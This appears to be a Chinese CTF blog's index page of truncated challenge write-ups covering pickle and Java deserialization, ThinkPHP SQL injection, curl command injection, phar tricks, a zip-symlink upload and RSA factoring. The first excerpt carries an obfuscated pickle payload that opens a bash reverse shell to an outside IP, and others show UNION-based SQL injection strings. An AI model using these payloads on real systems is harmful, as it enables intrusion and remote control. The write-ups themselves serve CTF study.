第二届黄河流域Wp
第二届黄河流域wpWebpython一眼pickle反序列化
先注册
直接上大招unicode
12345678import base64payload=b'''(S'key1'\nS'val1'\ndS'vul'\n(cos\nsystem\nV\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u0031\u0030\u0031\u002e\u0033\u0034\u002e\u0038\u0030\u002e\u0031\u0035\u0032\u002f\u0039\u0039\u0039\u0039\u0020\u0030\u003e\u0026\u0031\u0022\nos.' ...
CTfshow某些大赛原题
web68812345678910111213<?phphighlight_file(__FILE__);error_reporting(0);//flag in /flag$url = $_GET['url'];$urlInfo = parse_url($url);if(!("http" === strtolower($urlInfo["scheme"]) || "https"===strtolower($urlInfo["scheme"]))){ die( "scheme error!"); }$url=escapeshellarg($url);$url=escapeshellcmd($url);system("curl ".$url);
传参发现它存在转义字符
会对符号进行转义,造成符号没法使用,加一个\符号就好,奇怪的是我需要再flag后面加个空格,不解,难道是当时卡了?
1?url=http://101. ...
2024蓝桥杯题目
2024蓝桥杯题目总结烂比赛。。。无语
爬虫协议访问robots.txt
访问 /1fb6ef7792e7bc86b0c0be4261803dab/
接着访问
4b7a99bffa86374fe870bb6827f27e69
得到flag{5bf34f66-c095-47bc-8e8f-28fe52b074b2}
rc4ida反编译断点搭在printf
动调得到flag
packet19流发现base64
解码得到flag
cc题目如图所示
拿去CyberChef解密
Theorem
HNctf
做了一题没在做了。。。有空再复现吧
WebPlease_RCE_Me
ez_tp话说这个题当时被非预期了(日志里就有payloadhhh,但是我下的附件里没有…去复现一手
readme文档里发现是thinkphp3.2.3
了解到thinkphp3.2.3存在sql注入漏洞
找一下初始页面在哪ez_tp/App/Home/Controller/IndexController.class.php
过滤了一大串,但是没建union呢
看样子要触发h_n这个函数,可是怎么触发呢
首先这是个公共函数存在外部调用ControllerName 是 Index,ActionName 是 h_n。因此,触发 h_n 函数的基本 URL 是 index.php/Home/Index/h_n。get传入一个name可以触发h_n
前面还有一部分代码利用循环来检测黑名单,设置waf
既然是对name传参,那么我们从处理name的方法I开始
convention.php里可以看到filter是htmlspecialchars(),
先经过htmlspecialc ...
常用姿势
web804 phar反序列化12345678910111213141516171819202122error_reporting(0);highlight_file(__FILE__);class hacker{ public $code; public function __destruct(){ eval($this->code); }}$file = $_POST['file'];$content = $_POST['content'];if(isset($content) && !preg_match('/php|data|ftp/i',$file)){ if(file_exists($file)){ unlink($file); }else{ file_put_contents($file,$content); }}
...
数字中国Wp
数字中国wp
Wirshark2.1theanswerishere.php
Wirshark2.216P<GET /sql/Less-1/theanswerishere.php?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g'--+ HTTP/1.1
根据语句可以看出有3列
Wirshark2.31/sql/Less-1/theanswerishere.php?id=0' union select 1,2,group_concat(th1sfI4g) from fl4g--+ HTTP/1.1
列名为th1sfl4g
Wirshark2.4
flag{th1s_ls_tHe_sQI1_anSwer}
Ctfshow--Java反序列化
ctfshow–Java反序列化web846打urldns链就行,他检测到有dns请求即可
URLDNS.java
12345678910111213141516171819202122232425262728import java.io.FileOutputStream;import java.io.IOException;import java.io.ObjectOutputStream;import java.lang.reflect.Field;import java.net.URL;import java.util.HashMap;public class URLDNS { public static void serialize(Object obj) throws IOException { ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("./ser.bin")); object ...
Shenghuo2耶的密码宝典
P05. 基于N分解的RSA题目
对N进行分解(只要知道p和q,就能解出任何rsa)
N在有一般情况下不可分解的,如果p和q太接近,或相差过大,或pq很小等情况
1.在线查询分解网站1http://www.factordb.com/index.php
2.使用yafu工具分解下载地址:https://sourceforge.net/projects/yafu/
12345#以分解49为例yafu-x64.exe factor(49)#导入文件进行分解,主要注意文本结尾要换行!!!不然要报错yafu-x64.exe "factor(@)" -batchfile 1.txt
3.使用费马分解网上找的脚本,p和q太接近
123456789101112131415161718192021222324252627282930def isqrt(n): x = n y = (x + n // x) // 2 while y < x: x = y y = (x + n // x) // 2 return xdef fermat(n, verbose ...
2023国赛Web题目复现
2023国赛Web题目复现unzip软连接的文件上传
随意上传一个文件跳转到
12345678910 <?phperror_reporting(0);highlight_file(__FILE__);$finfo = finfo_open(FILEINFO_MIME_TYPE);if (finfo_file($finfo, $_FILES["file"]["tmp_name"]) === 'application/zip'){ exec('cd /tmp && unzip -o ' . $_FILES["file"]["tmp_name"]);};//only this!
给文件解压并放到/tmp目录下,????这我利用个鸡毛啊,后面了解到unzip跟软连接相关
首先单独创建一个文件夹flaa
123ln -s /var/www/html linkzip --symlinks link.zip link
...
DASCTF X GFCTF 2024
DASCTF X GFCTF 2024是赛后复现(难甭
WebCool_index123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121import express from "express";import jwt from "jsonwebtoken";import cookieParser from "cookie-parser";import crypto from "crypto";const FLAG = process.env.DASFLAG | ...